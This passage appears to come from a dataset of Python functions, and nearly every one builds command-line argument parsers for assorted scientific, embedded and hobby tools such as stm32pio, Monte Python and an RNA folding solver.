args.categories:\n show_categories()\n elif args.show:\n show_sources_category(args.show)\n elif args.news:\n if args.news in news_codes:\n show_news(args.news, BASE_URL)\n else:\n print(\"Invalid news code.\")\n sys.exit(1)", "def initCmdLineParser():\n\n # Init parser and all general flags\n logging.debug(\"initiating command line option parser\")\n usage = \"usage: %prog [options]\"\n parser = OptionParser(usage)\n parser.add_option(\"--gen-answer-file\", help=\"Generate a template of an answer file, using this option excludes all other option\")\n parser.add_option(\"--answer-file\", help=\"Runs the configuration in none-interactive mode, extracting all information from the \\\n configuration file. 
using this option excludes all other option\")\n parser.add_option(\"--no-mem-check\", help=\"Disable minimum memory check\", action=\"store_true\", default=False)\n\n # For each group, create a group option\n for group in controller.getAllGroups():\n groupParser = OptionGroup(parser, group.getKey(\"DESCRIPTION\"))\n\n for param in group.getAllParams():\n cmdOption = param.getKey(\"CMD_OPTION\")\n paramUsage = param.getKey(\"USAGE\")\n optionsList = param.getKey(\"OPTION_LIST\")\n useDefault = param.getKey(\"USE_DEFAULT\")\n if not useDefault:\n if optionsList:\n groupParser.add_option(\"--%s\" % cmdOption, metavar=optionsList, help=paramUsage, choices=optionsList)\n else:\n groupParser.add_option(\"--%s\" % cmdOption, help=paramUsage)\n\n # Add group parser to main parser\n parser.add_option_group(groupParser)\n\n return parser", "def _ParseCommandArguments():\n arg_parser = argparse.ArgumentParser()\n arg_parser.usage = __doc__\n\n arg_parser.add_argument('--download-dir',\n type=str,\n required=True,\n help='Directory into which corpora are downloaded.')\n arg_parser.add_argument('--build-dir',\n required=True,\n type=str,\n help='Directory where fuzzers were built.')\n args = arg_parser.parse_args()\n return args", "def make_parser():\n p = argparse.ArgumentParser(\n description=\"Visualize and analyze error from oblique/straight tag observations\"\n )\n\n p.add_argument(\"-n\", help=\"name of the test in the config file\")\n\n p.add_argument(\"-t\", help=\"throw out bad tags\", action=\"store_true\")\n\n p.add_argument(\"-v\", help=\"visualize data\", action=\"store_true\")\n\n p.add_argument(\"-i\", help=\"print result data\", action=\"store_true\")\n\n return p", "def get_parser():\n parser = argparse.ArgumentParser(description='RL training for MEDA')\n # device\n parser.add_argument('--cuda', help='CUDA Visible devices', default='0', type=str, required=False)\n parser.add_argument('--algo', help='RL Algorithm', default='PPO', type=str, required=False, choices=list(ALGOS.keys()))\n # rl training\n parser.add_argument('--method', help='The method use for rl training (centralized, sharing, concurrent)',\n type=str, default='concurrent', choices=['centralized', 'sharing', 'concurrent'])\n parser.add_argument('--n-repeat', help='Number of repeats for the experiment', type=int, default=3)\n parser.add_argument('--start-iters', help='Number of iterations the initialized model has been trained',\n type=int, default=0)\n parser.add_argument('--stop-iters', help='Total number of iterations (including pre-train) for one repeat of the experiment',\n type=int, default=100)\n parser.add_argument('--n-timesteps', help='Number of timesteps for each iteration',\n type=int, default=20000)\n # env settings\n parser.add_argument('--width', help='Width of the biochip', type = int, default = 30)\n parser.add_argument('--length', help='Length of the biochip', type = int, default = 60)\n parser.add_argument('--n-agents', help='Number of agents', type = int, default = 2)\n parser.add_argument('--b-degrade', action = \"store_true\")\n parser.add_argument('--per-degrade', help='Percentage of degrade', type = float, default = 0.1)\n # rl evaluate\n parser.add_argument('--n-evaluate', help='Number of episodes to evaluate the model for each iteration',\n type=int, default=20)\n return parser", "def get_parser():\n\n parser = ArgumentParser()\n\n req_argument = parser.add_argument_group('required arguments')\n\n parser.add_argument(\"-o\", \"--outdir\", type=str, default='result',\n help=\"Path for results\")\n 
parser.add_argument(\"-fname\", \"--file_name\", type=str, default=\"try1\",\n help=\"The name the output file should have within the output directory\")\n parser.add_argument(\"-freq\", \"--frequency\", type=str,\n help=\"File to read the haplotype frequencies from\")\n parser.add_argument(\"-over\", \"--overlap\", type=str,\n help=\"File to read the peptide vs alleles or peptide vs haplotype data\")\n parser.add_argument(\"-o_a\", \"--overlap_allele\", type=int, default=0,\n help=\"1 if the --overlap file passed in is peptide vs alleles and 0 if it is peptide vs haplotypes and has already been binarized\")\n # parser.add_argument(\"-n\", \"--ntarget\", type=int, default=5,\n # help=\"The ntarget for max n-times coverage\")\n parser.add_argument(\"-maxpep\", \"--max_number_of_pepts\", type=int, default=30,\n help=\"The maximum number of peptides allowed in a vaccine\")\n parser.add_argument(\"-c\", \"--cut\", type=int, default=3,\n help=\"The cut value for ommitting peptides that are too similar; a value of 0 should be provided if similar peptides are not to be excluded from a vaccine design.\")\n\n\n \n return parser", "def parse_args(args: List[str]) -> Optional[argparse.Namespace]:\n\n root = argparse.ArgumentParser(description=inspect.cleandoc('''\n Small cross-platform Python app that can create and update PlatformIO projects from STM32CubeMX .ioc files. It\n uses STM32CubeMX to generate a HAL-framework-based code and alongside creates PlatformIO project with compatible\n parameters to stick them both together. Both CLI and GUI editions are available. Visit\n https://github.com/ussserrr/stm32pio for more information. Use 'stm32pio [command] -h' to see help on the\n particular command'''))\n\n # Global arguments (there is also an automatically added '-h, --help' option)\n root.add_argument('--version', action='version', version=f\"stm32pio {stm32pio.core.util.get_version()}\")\n root.add_argument('-v', '--verbose', help=\"enable verbose output (default level: INFO)\", action='count', default=1)\n\n sub = root.add_subparsers(dest='command', title='commands', description=\"valid commands\", help=\"available actions\")\n\n # Primary operations\n init = sub.add_parser('init', help=\"create config .INI file to check and tweak parameters before proceeding\")\n generate = sub.add_parser('generate', help=\"generate CubeMX code only\")\n pio_init = sub.add_parser('pio_init', help=\"create new compatible PlatformIO project\")\n patch = sub.add_parser('patch', help=\"tweak the project so both CubeMX and PlatformIO could work together\")\n new = sub.add_parser('new', help=\"generate CubeMX code, create PlatformIO project and glue them together\")\n status = sub.add_parser('status', help=\"inspect the project current state\")\n validate = sub.add_parser('validate', help=\"verify current environment based on the config values\")\n clean = sub.add_parser('clean', help=\"clean-up the project (by default, no files will be deleted immediately \"\n \"without your confirmation)\")\n gui = sub.add_parser('gui', help=\"start the graphical version of the application. 
All arguments will \"\n \"be passed forward, see its own --help for more information\")\n\n # Assign options to commands\n for command in [init, generate, pio_init, patch, new, status, validate, clean, gui]:\n command.add_argument('-d', '--directory', dest='path', default=Path.cwd(),\n help=\"path to the project (current directory, if not given)\")\n for command in [init, pio_init, new, gui]:\n command.add_argument('-b', '--board', dest='board', default='', help=\"PlatformIO board name. \" + board_hint)\n for command in [init, generate, new]:\n command.add_argument('-e', '--start-editor', dest='editor',\n help=\"start the specified editor after an action (e.g. subl, code, atom, etc.)\")\n for command in [generate, new]:\n command.add_argument('-c', '--with-build', action='store_true', help=\"build the project after code generation\")\n for command in [init, new]:\n command.add_argument('-s', '--store-content', action='store_true',\n help=\"save folder initial contents as a cleanup ignore list\")\n clean.add_argument('-s', '--store-content', action='store_true',\n help=\"save project folder contents as a cleanup ignore list and exit\")\n clean.add_argument('-q', '--quiet', action='store_true',\n help=\"suppress the caution about the content removal (be sure of what you are doing!)\")\n\n if len(args) == 0:\n root.print_help()\n return None\n\n return root.parse_args(args)", "def parseCommandLine():\n\n parser = argparse.ArgumentParser(\n description='Determine photometric zeropoint of banzai-reduced LCO imaging data.')\n\n\n parser.add_argument('--log-level', dest='log_level', default='INFO', choices=['DEBUG', 'INFO'],\n help='Set the log level')\n parser.add_argument('--ps1dir', dest='ps1dir', default='~/Catalogs/ps1odi/panstarrs/',\n help='Directory of PS1 catalog')\n parser.add_argument(\"--diagnosticplotsdir\", dest='outputimageRootDir', default=None,\n help='Output directory for diagnostic photometry plots. No plots generated if option is omitted. This is a time consuming task. ')\n parser.add_argument('--photodb', dest='imagedbPrefix', default='~/lcozpplots/lcophotzp.db',\n help='Result output directory. .db file is written here')\n parser.add_argument('--imagerootdir', dest='rootdir', default='/archive/engineering',\n help=\"LCO archive root directory\")\n parser.add_argument('--site', dest='site', default=None, help='sites code for camera')\n parser.add_argument('--mintexp', dest='mintexp', default=60, type=float, help='Minimum exposure time to accept')\n parser.add_argument('--redo', action='store_true')\n parser.add_argument ('--preview', dest='processstatus', default='processed', action='store_const', const='preview')\n\n\n\n mutex = parser.add_mutually_exclusive_group()\n mutex.add_argument('--date', dest='date', default=[None,], nargs='+', help='Specific date to process.')\n mutex.add_argument('--lastNdays', type=int)\n\n\n cameragroup = parser.add_mutually_exclusive_group()\n\n cameragroup.add_argument('--camera', dest='camera', default=None, help='specific camera to process. ')\n cameragroup.add_argument('--cameratype', dest='cameratype', default=None, choices=['fs', 'fl', 'kb'],\n help='camera type to process at selected sites to process. 
')\n cameragroup.add_argument('--crawldirectory', default=None, type=str,\n help=\"process all reduced image in specific directoy\")\n\n args = parser.parse_args()\n\n logging.basicConfig(level=getattr(logging, args.log_level.upper()),\n format='%(asctime)s.%(msecs).03d %(levelname)7s: %(module)20s: %(message)s')\n\n args.imagedbPrefix = os.path.expanduser(args.imagedbPrefix)\n\n if args.outputimageRootDir is not None:\n args.outputimageRootDir = os.path.expanduser(args.outputimageRootDir)\n print (\"Writing db to directory: %s\" % args.outputimageRootDir)\n\n if args.crawldirectory is not None:\n args.crawldirectory = os.path.expanduser(args.crawldirectory)\n\n\n\n if (args.lastNdays is not None):\n args.date=[]\n today = datetime.datetime.utcnow()\n for ii in range (args.lastNdays):\n day = today - datetime.timedelta(days=ii)\n args.date.append (day.strftime(\"%Y%m%d\"))\n\n args.date = args.date[::-1]\n\n args.ps1dir = os.path.expanduser(args.ps1dir)\n\n print (args.processstatus)\n return args", "def setParser():\n parser = argparse.ArgumentParser(\n prog=\"Nussinov Algorithm Solver\",\n description=\"A program that runs Nussinov's Algorithm on a given RNA strand and returns the most viable pairings.\"\n )\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-f\", \"--filepath\", help=\"the path to a text file with a sequence\")\n group.add_argument(\"-s\", \"--sequence\", help=\"the RNA sequence to evaluate\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"More verbose output\")\n parser.add_argument(\"-u\", \"--uncommon\", action=\"store_true\", help=\"Use Uncommon RNA matches (G,U)\")\n return parser", "def read_cmd(self):\n\n parser = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter)\n req_opts = parser.add_argument_group(\"Required Options\")\n req_opts.add_argument(\"--instance_dir\", required=True,\n help=\"directory with instances (not recursive\")\n \n opt_opts = parser.add_argument_group(\"Optional Options\")\n \n opt_opts.add_argument(\"--fn_suffix\", default=\".*\",\n help=\"suffix of instance file names\")\n opt_opts.add_argument(\"--cutoff\", default=10, type=int,\n help=\"running time cutoff [sec]\")\n opt_opts.add_argument(\"--memlimit\", default=2048, type=int,\n help=\"memory limit\")\n opt_opts.add_argument(\"--ac_budget\", default=360,\n help=\"configuration budget [sec]\")\n opt_opts.add_argument(\"--run_obj\", default=\"runtime\",\n choices=[\"runtime\", \"quality\"],\n help=\"run objective\")\n opt_opts.add_argument(\"--par-factor\", default=10,\n help=\"Factor by which to penalize unsolved instances. 
Usage may differ based on TAE used.\")\n\n opt_opts.add_argument(\"--binary\", default=\"clingo\",\n help=\"target binary\")\n opt_opts.add_argument(\"--pcs_file\", default=\"pcs/all_params.pcs\",\n help=\"parameter configuration file\")\n opt_opts.add_argument(\"--runsolver\", default=\"binaries/runsolver\",\n help=\"runsolver binary\")\n opt_opts.add_argument(\"--tae_class\", default=None,\n help=\"TAE class to individualize clingo calls -- has to inherit from smac.tae.execute_ta_run_aclib.ExecuteTARunAClib\")\n\n\n opt_opts.add_argument(\"--seed\", default=12345, type=int,\n help=\"random seed\")\n opt_opts.add_argument(\"--verbose_level\", default=logging.INFO,\n choices=[\"INFO\", \"DEBUG\"],\n help=\"random seed\")\n opt_opts.add_argument(\"--tae_args\", default=\"{}\",\n help=\"Miscellaneous options for the TAE\")\n \n\n args_, misc = parser.parse_known_args()\n self._check_args(args_)\n args_.tae_args=json.loads(args_.tae_args)\n\n # remove leading '-' in option names\n misc = dict((k.lstrip(\"-\"), v.strip(\"'\"))\n for k, v in zip(misc[::2], misc[1::2]))\n\n misc[\"instances\"] = self._find_files(dir_=args_.instance_dir, suffix_=args_.fn_suffix)\n misc[\"wallclock_limit\"] = args_.ac_budget\n misc[\"cutoff_time\"] = args_.cutoff\n misc[\"paramfile\"] = args_.pcs_file\n misc[\"algo\"] = \"\"\n misc[\"run_obj\"] = args_.run_obj\n\n return args_, misc", "def build_parser():\n desc = (\"Scrape Hearthstone decks from HearthPwn, then build a SQLite \"\n \"database of the results. Also integrates with omgvamp's Mashape \"\n \"Hearthstone API (http://hearthstoneapi.com/) to build a table of \"\n \"card data that can be used to make more advanced queries.\")\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument('--buildcards', action='store_true',\n help='(re)build card database from Mashape')\n parser.add_argument('--builddecks', action='store_true',\n help='(re)build deck database from HearthPwn')\n parser.add_argument('--perclass', action='store_true',\n help='get the same number of decks for each class')\n parser.add_argument('--count', type=int,\n help='number of decks to retrieve (per class, if'\n ' --perclass is set)')\n parser.add_argument('--filtering',\n help='the HearthPwn filter used when finding decks, '\n 'as seen in the HearthPwn URL')\n parser.add_argument('--sorting',\n help='the HearthPwn sorting used when finding '\n 'decks, as seen in the HearthPwn URL after '\n '\"&sort=\"')\n parser.add_argument('--patch', type=int,\n help='the HearthPwn patch ID used when finding '\n 'decks, as seen in the HearthPwn URL after '\n '\"&filter-build=\"')\n parser.add_argument('--results', action='store_true',\n help='for all cards, print the: cardname, total decks '\n 'using the card, percentage of decks '\n 'using the card, and average number of the card '\n 'in decks using the card')\n return parser", "def setup_parser():\n PARSER = argparse.ArgumentParser(description='Running GSI')\n\n PARSER.add_argument('analysis_datetime', type=str, help=\"analysis_datetime\")\n PARSER.add_argument('gsi_dir', type=str, help=\"gsi_dir\")\n PARSER.add_argument('gsi_processor', type=int, help=\"gsi_processor\")\n PARSER.add_argument('cycle_interval', type=int, help=\"cycle_interval\")\n PARSER.add_argument('model_vertical_level', type=int, help=\"model_vertical_level\")\n PARSER.add_argument('background_data', type=str, help=\"background_data\")\n PARSER.add_argument('crtm_root', type=str, help=\"crtm_root\")\n PARSER.add_argument('gsi_root', type=str, help=\"gsi_root\")\n \n 
PARSER.add_argument('--f_prepbufr', type=str, dest=\"f_prepbufr\", default='')\n PARSER.add_argument('--f_1bamua', type=str, dest=\"f_1bamua\", default='')\n PARSER.add_argument('--f_1bhrs4', type=str, dest=\"f_1bhrs4\", default='')\n PARSER.add_argument('--f_1bmhs', type=str, dest=\"f_1bmhs\", default='')\n PARSER.add_argument('--f_gpsro', type=str, dest=\"f_gpsro\", default='')\n PARSER.add_argument('--f_radwnd', type=str, dest=\"f_radwnd\", default='')\n PARSER.add_argument('--f_refInGSI', type=str, dest=\"f_refInGSI\", default='')\n PARSER.add_argument('--model_core', type=str, dest=\"model_core\", default='ARW')\n PARSER.add_argument('--cv_option', type=str, dest=\"cv_option\", default='NAM')\n PARSER.add_argument('--computing_platform', type=str, dest=\"computing_platform\", default='LINUX_PBS')\n PARSER.add_argument('--new_run', type=str, dest=\"new_run\", default='True')\n PARSER.add_argument('--outer_loop', type=int, dest=\"outer_loop\", default=2)\n PARSER.add_argument('--inner_loop', type=int, dest=\"inner_loop\", default=50)\n PARSER.add_argument('--if_clean', type=str, dest=\"if_clean\", default='no')\n\n '''\n python Main_Script.py 2017082112 /mnt/WRF/gsi_test/practice_11 4 1 50 /mnt/WRF/wrf_1FMTHf/wrfinput_d01 /opt/miniconda2/envs/wrf/crtm-2.2.3/CRTM_2.2.3 /opt/miniconda2/envs/wrf/comGSIv3.5_EnKFv1.1 --f_prepbufr /opt/miniconda2/envs/wrf/bufr_stuff/bin/test.bufr\n return PARSER.parse_args(['2017082112', '/home/szhang/gsi_directory/practice_10', \n 4, 1, 50,\n '/home/szhang/gsi_directory/practice_10/background_data', \n '/home/szhang/gsi_directory/practice_10/crtm_root', \n '/home/szhang/gsi_directory/practice_10/gsi_root', \n '--f_prepbufr', '/home/szhang/gsi_directory/practice_10/f_prepbufr'])\n '''\n return PARSER.parse_args()", "def build_parser():\n parser = argparse.ArgumentParser(description='The classic FizzBuzz game in programmatic form.', add_help=False)\n parser.add_argument('-h', '--help', default=argparse.SUPPRESS, action='help',\n help='Show this help message and exit.')\n parser.add_argument('-s', '--start', default=1, type=int, action='store', metavar='START',\n help='The number to start FizzBuzzing at (inclusive).')\n parser.add_argument('stop', type=int, action='store', metavar='STOP',\n help='The number to end FizzBuzzing at (exclusive).')\n return parser", "def parse_commandline():\n parser = optparse.OptionParser(usage = __doc__,version=git_version.verbose_msg)\n\n parser.add_option(\"-t\", \"--timeFile\",help=\"Text file with central times.\",default = 'centralTimes.txt')\n\tparser.add_option(\"-c\", \"--channel\",help=\"IFO channel.\",default = 'L1:GDS-CALIB_STRAIN')\n\tparser.add_option(\"-w\", \"--workdirectory\",help=\"Working directory.\",default = '.')\n\tparser.add_option(\"-s\", \"--sourceDir\",help=\"Name of source directory.\",default = 'source')\n\n opts, args = parser.parse_args()\n return opts", "def build_arg_parser():\n parser = argparse.ArgumentParser(\n description=\"Generate Carla videos with semantic segmentation maps.\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n parser.add_argument(\"--num_runs\", \"-n\", type=int, default=1, help=\"How many simulations to run.\")\n parser.add_argument(\"--fps\", \"-fps\", type=int, default=20, help=\"At how many FPS the simulation is running.\")\n parser.add_argument(\"--num_frames\", \"-f\", type=int, default=200, help=\"How many frames to record.\")\n parser.add_argument(\"--time_inter\", \"-t\", type=int, default=1, help=\"Time interval between recorded frames.\")\n 
parser.add_argument(\"--vehicles\", \"-v\", type=int, default=80, help=\"Number of other vehicles.\")\n parser.add_argument(\"--pedestrians\", \"-p\", type=int, default=0, help=\"Number of pedestrians.\")\n parser.add_argument(\"--output_dir\", \"-o\", default=\"./images/\", help=\"Data output directory.\")\n parser.add_argument(\"--window_width\", \"-ww\", type=int, default=512, help=\"Width of the Carla window.\")\n parser.add_argument(\"--window_height\", \"-wh\", type=int, default=256, help=\"Height of the Carla window.\")\n parser.add_argument(\"--fov\", \"-fov\", default=120, help=\"Horizontal field of view.\")\n parser.add_argument(\"--sensor_tick\", \"-st\", default=0.0, help=\"Number of seconds between sensor measurements.\")\n return parser", "def _parse_args():\n desc = 'download dependencies for the AST exporter and built it.'\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument('-c', '--clean-all', default=False,\n action='store_true', dest='clean_all',\n help='clean everything before building')\n thelp = 'sanity test ast exporter using tinycbor (linux only)'\n parser.add_argument('-t', '--test', default=False,\n action='store_true', dest='sanity_test',\n help=thelp)\n parser.add_argument('--with-clang', default=False,\n action='store_true', dest='with_clang',\n help='build clang with this tool')\n parser.add_argument('--without-assertions', default=True,\n action='store_false', dest='assertions',\n help='build the tool and clang without assertions')\n c.add_args(parser)\n args = parser.parse_args()\n c.update_args(args)\n return args", "def _parse_arguments(text):\n parser = argparse.ArgumentParser(\n description=\"Build Python-based Rez packages in just a single command.\",\n )\n\n parser.add_argument(\n \"--hdas\",\n nargs=\"+\",\n help=\"The relative paths to each folder containing VCS-style Houdini HDAs.\",\n )\n\n parser.add_argument(\n \"-i\",\n \"--items\",\n nargs=\"+\",\n help=\"The relative paths to each file/folder to copy / install.\",\n )\n\n parser.add_argument(\n \"-e\",\n \"--eggs\",\n nargs=\"+\",\n help=\"The relative paths to each file/folder to make into a .egg file.\",\n )\n\n parser.add_argument(\n \"--symlink\",\n action=\"store_true\",\n default=linker.must_symlink(),\n help=\"If True, symlink everything back to the source Rez package.\",\n )\n\n parser.add_argument(\n \"--symlink-files\",\n action=\"store_true\",\n default=linker.must_symlink_files(),\n help=\"If True, symlink files back to the source Rez package.\",\n )\n\n parser.add_argument(\n \"--symlink-folders\",\n action=\"store_true\",\n default=linker.must_symlink_folders(),\n help=\"If True, symlink folders back to the source Rez package.\",\n )\n\n known, _ = parser.parse_known_args(text)\n\n return known", "def create_parser():\n helpdict = create_parser.helpdict\n # Customized usage, for more verbosity concerning these subparsers options.\n usage = \"\"\"%(prog)s [-h] [--version] {run,info} ... 
\"\"\"\n usage += tw.dedent(\"\"\"\\n\n From more help on each of the subcommands, type:\n %(prog)s run -h\n %(prog)s info -h\\n\\n\"\"\")\n\n # parser = ap.ArgumentParser(\n #parser = MpArgumentParser(\n #formatter_class=ap.ArgumentDefaultsHelpFormatter,\n #description='Monte Python, a Monte Carlo code in Python',\n #usage=usage)\n parser = initialise_parser(\n description='Monte Python, a Monte Carlo code in Python', usage=usage)\n\n # -- add the subparsers\n subparser = parser.add_subparsers(dest='subparser_name')\n\n ###############\n # run the MCMC\n runparser = add_subparser(subparser, 'run', help=\"run the MCMC chains\")\n\n # -- number of steps (OPTIONAL)\n runparser.add_argument('-N', help=helpdict['N'], type=positive_int,\n dest='N')\n # -- output folder (OBLIGATORY)\n runparser.add_argument('-o', '--output', help=helpdict['o'], type=str,\n dest='folder')\n # -- parameter file (OBLIGATORY)\n runparser.add_argument('-p', '--param', help=helpdict['p'],\n type=existing_file, dest='param')\n # -- covariance matrix (OPTIONAL)\n runparser.add_argument('-c', '--covmat', help=helpdict['c'],\n type=existing_file, dest='cov')\n # -- jumping method (OPTIONAL)\n runparser.add_argument('-j', '--jumping', help=helpdict['j'],\n dest='jumping', default='fast',\n choices=['global', 'sequential', 'fast'])\n # -- sampling method (OPTIONAL)\n runparser.add_argument('-m', '--method', help=helpdict['m'],\n dest='method', default='MH',\n choices=['MH', 'NS', 'PC', 'CH', 'IS', 'Der', 'Fisher'])\n # -- update Metropolis Hastings (OPTIONAL)\n runparser.add_argument('--update', help=helpdict['update'], type=int,\n dest='update', default=50)\n # -- update Metropolis Hastings with an adaptive jumping factor (OPTIONAL)\n runparser.add_argument('--superupdate', help=helpdict['superupdate'], type=int,\n dest='superupdate', default=0)\n # -- superupdate acceptance rate argument (OPTIONAL)\n runparser.add_argument('--superupdate-ar', help=helpdict['superupdate-ar'], type=float,\n dest='superupdate_ar', default=0.26)\n # -- superupdate acceptance rate tolerance argument (OPTIONAL)\n runparser.add_argument('--superupdate-ar-tol', help=helpdict['superupdate-ar-tol'], type=float,\n dest='superupdate_ar_tol', default=0.01)\n # -- adaptive jumping factor Metropolis Hastings (OPTIONAL)\n runparser.add_argument('--adaptive', help=helpdict['adaptive'], type=int,\n dest='adaptive', default=0)\n # -- adaptive ts argument (OPTIONAL)\n runparser.add_argument('--adaptive-ts', help=helpdict['adaptive-ts'], type=int,\n dest='adaptive_ts', default=1000)\n\n # -- jumping factor (OPTIONAL)\n runparser.add_argument('-f', help=helpdict['f'], type=float,\n dest='jumping_factor', default=2.4)\n # -- temperature (OPTIONAL)\n runparser.add_argument('-T', help=helpdict['T'], type=float,\n dest='temperature', default=1.0)\n # -- minimize (OPTIONAL)\n runparser.add_argument('--minimize', help=helpdict['minimize'],\n action='store_true')\n # -- minimize argument, minimization tolerance (OPTIONAL)\n runparser.add_argument('--minimize-tol', help=helpdict['minimize-tol'], type=float,\n dest='minimize_tol', default=0.00001)\n # -- fisher (OPTIONAL)\n runparser.add_argument('--fisher', help=helpdict['fisher'],\n action='store_true')\n # -- fisher argument (OPTIONAL)\n runparser.add_argument('--fisher-asymmetric', help=helpdict['fisher-asymmetric'],\n dest='fisher_asymmetric',action='store_true')\n # -- fisher step iteration (OPTIONAL)\n runparser.add_argument('--fisher-step-it', help=helpdict['fisher-step-it'],\n dest='fisher_step_it', 
default=10)\n # -- fisher step iteration argument, -deltaloglkl target (OPTIONAL)\n runparser.add_argument('--fisher-delta', help=helpdict['fisher-delta'], type=float,\n dest='fisher_delta', default=0.1)\n # -- fisher step iteration argument, -deltaloglkl tolerance (OPTIONAL)\n runparser.add_argument('--fisher-tol', help=helpdict['fisher-tol'], type=float,\n dest='fisher_tol', default=0.05)\n # -- fisher symmetric likelihood assumption threshold (OPTIONAL)\n runparser.add_argument('--fisher-sym-lkl', help=helpdict['fisher-sym-lkl'], type=float,\n dest='fisher_sym_lkl', default=0.1)\n # -- configuration file (OPTIONAL)\n runparser.add_argument('--conf', help=helpdict['conf'],\n type=str, dest='config_file',\n default='default.conf')\n # -- arbitrary numbering of an output chain (OPTIONAL)\n runparser.add_argument('--chain-number', help=helpdict['chain-number'])\n # -- stop run after first successful update using --update (EXPERIMENTAL)\n runparser.add_argument('--stop-after-update', help=helpdict['stop-after-update'],\n dest='stop_after_update', action='store_true')\n # display option\n runparser.add_argument('--display-each-chi2', help=helpdict['display-each-chi2'],\n dest='display_each_chi2', action='store_true')\n # -- parallel chains without MPI (OPTIONAL)\n runparser.add_argument('--parallel-chains', help=helpdict['parallel-chains'],\n action='store_true')\n\n ###############\n # MCMC restart from chain or best fit file\n runparser.add_argument('-r', '--restart', help=helpdict['r'],\n type=existing_file, dest='restart')\n runparser.add_argument('-b', '--bestfit', dest='bf', help=helpdict['b'],\n type=existing_file)\n\n ###############\n # Silence the output (no print on the console)\n runparser.add_argument('--silent', help=helpdict['silent'],\n action='store_true')\n ###############\n # Adding new derived parameters to a run\n runparser.add_argument(\n '--Der-target-folder', dest=\"Der_target_folder\",\n help=helpdict['Der-target-folder'], type=str, default='')\n runparser.add_argument(\n '--Der-param-list', dest='derived_parameters',\n help=helpdict['Der-param-list'], type=str, default='', nargs='+')\n\n ###############\n # Importance Sampling Arguments\n runparser.add_argument(\n '--IS-starting-folder', dest='IS_starting_folder',\n help=helpdict['IS-starting-folder'], type=str, default='', nargs='+')\n\n ###############\n # We need the following so the run does not crash if one of the external\n # samplers is not correctly installed despite not being used\n from contextlib import contextmanager\n import sys, os\n\n @contextmanager\n def suppress_stdout():\n with open(os.devnull, \"w\") as devnull:\n old_stdout = sys.stdout\n sys.stdout = devnull\n try:\n yield\n finally:\n sys.stdout = old_stdout\n\n ###############\n # MultiNest arguments (all OPTIONAL and ignored if not \"-m=NS\")\n # The default values of -1 mean to take the PyMultiNest default values\n try:\n with suppress_stdout():\n from MultiNest import NS_prefix, NS_user_arguments\n NSparser = runparser.add_argument_group(\n title=\"MultiNest\",\n description=\"Run the MCMC chains using MultiNest\"\n )\n for arg in NS_user_arguments:\n NSparser.add_argument('--'+NS_prefix+arg,\n default=-1,\n **NS_user_arguments[arg])\n except ImportError:\n # Not defined if not installed\n pass\n except:\n warnings.warn('PyMultiNest detected but MultiNest likely not installed correctly. 
'\n 'You can safely ignore this if not running with option -m NS')\n\n ###############\n # PolyChord arguments (all OPTIONAL and ignored if not \"-m=PC\")\n # The default values of -1 mean to take the PyPolyChord default values\n try:\n with suppress_stdout():\n from PolyChord import PC_prefix, PC_user_arguments\n PCparser = runparser.add_argument_group(\n title=\"PolyChord\",\n description=\"Run the MCMC chains using PolyChord\"\n )\n for arg in PC_user_arguments:\n PCparser.add_argument('--'+PC_prefix+arg,\n default=-1,\n **PC_user_arguments[arg])\n except ImportError:\n # Not defined if not installed\n pass\n except:\n warnings.warn('PyPolyChord detected but PolyChord likely not installed correctly. '\n 'You can safely ignore this if not running with option -m PC')\n\n ###############\n # CosmoHammer arguments (all OPTIONAL and ignored if not \"-m=CH\")\n # The default values of -1 mean to take the CosmoHammer default values\n try:\n with suppress_stdout():\n from cosmo_hammer import CH_prefix, CH_user_arguments\n CHparser = runparser.add_argument_group(\n title=\"CosmoHammer\",\n description=\"Run the MCMC chains using the CosmoHammer framework\")\n for arg in CH_user_arguments:\n CHparser.add_argument('--'+CH_prefix+arg,\n default=-1,\n **CH_user_arguments[arg])\n except ImportError:\n # Not defined if not installed\n pass\n except:\n warnings.warn('CosmoHammer detected but emcee likely not installed correctly. '\n 'You can safely ignore this if not running with option -m CH')\n\n ###############\n # Information\n infoparser = add_subparser(subparser, 'info',\n help=\"analyze the MCMC chains\")\n\n # -- folder to analyze\n infoparser.add_argument('files', help=helpdict['files'],\n nargs='+')\n # Silence the output (no print on the console)\n infoparser.add_argument('--silent', help=helpdict['silent'],\n action='store_true')\n # -- to only write the covmat and bestfit, without computing the posterior\n infoparser.add_argument('--minimal', help=helpdict['minimal'],\n action='store_true')\n # -- number of bins (defaulting to 20)\n infoparser.add_argument('--bins', help=helpdict['bins'],\n type=int, default=20)\n # -- temperature (OPTIONAL)\n infoparser.add_argument('-T', help=helpdict['T'], type=float,\n dest='temperature', default=1.0)\n # -- deprecated: remove the mean-likelihood line\n infoparser.add_argument('--no-mean', help=helpdict['no-mean'],\n dest='mean_likelihood_old', action='store_false')\n # -- plot the mean-likelihood line\n infoparser.add_argument('--plot-mean', help=helpdict['plot-mean'],\n dest='mean_likelihood', action='store_true')\n # -- to remove the mean and 68% limits on top of each 1D plot\n infoparser.add_argument('--short-title-1d', help=helpdict['short-title-1d'],\n dest='short_title_1d', action='store_true')\n # -- possible plot file describing custom commands\n infoparser.add_argument('--extra', help=helpdict['extra'],\n dest='optional_plot_file', default='')\n # -- if you just want the covariance matrix, use this option\n infoparser.add_argument('--noplot', help=helpdict['noplot'],\n dest='plot', action='store_false')\n # -- if you just want to output 1d posterior distributions (faster)\n infoparser.add_argument('--noplot-2d', help=helpdict['noplot-2d'],\n dest='plot_2d', action='store_false')\n # -- if you just want to output triangle with 2d contours\n infoparser.add_argument('--noplot-2d-diag', help=helpdict['noplot-2d-diag'],\n dest='plot_diag', action='store_false')\n # -- when plotting 2d posterior distribution, use contours and not contours\n # 
